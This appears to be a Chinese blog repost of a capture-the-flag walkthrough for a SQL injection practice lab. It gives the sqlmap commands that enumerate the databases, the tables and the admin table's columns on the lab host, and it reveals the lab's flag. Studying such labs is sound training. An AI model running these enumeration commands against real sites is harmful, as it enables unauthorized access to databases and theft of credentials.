热门标签
热门文章
- 1CentOS7安装PostgreSQL 14
- 2【学习经验分享NO.14】:Pyqt搭建YOLOv8/v7/v5界面(可凑大论的工作量)_yolov7可视化界面
- 3Xcode中的iOS模拟器(iOS Simulator)的介绍和使用心得_在 xcode 中安装 ios 模拟器
- 4护网蓝队面试题_以下哪个域名解析的ip主机对外开放了3306端口
- 5【网站项目】鲜花销售微信小程序
- 6python 引用其他的py文件的内容_python 跨文件调用字典
- 7单片机裸机环境下编写AT指令程序_单片机裸机环境下编写at指令程序.pdf
- 8flutter go_router 官方路由(一)基本使用_go_router 用法
- 92022年互联网大厂的中秋仪式感_it公司中秋
- 10STM32通过ESP8266连接阿里云 详细步骤_stm32esp8266连接阿里云
当前位置: article > 正文
【封神台】SQL注入靶场练习(sqlmap)_sqlmap注入靶场
作者:繁依Fanyi0 | 2024-04-19 19:24:38
赞
踩
sqlmap注入靶场
靶场地址
https://hack.zkaq.cn
题目
解题过程
1.进入题目
2.只有个 点击查看新闻,点击进入
3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍
查询数据库
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs
因为我们需要获得管理员密码,所以要查maoshe数据库
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tables -D maoshe
查admin表
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --columns -T admin -D maoshe
查password
输入flag :hellohack ,正确
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/453297
推荐阅读
相关标签
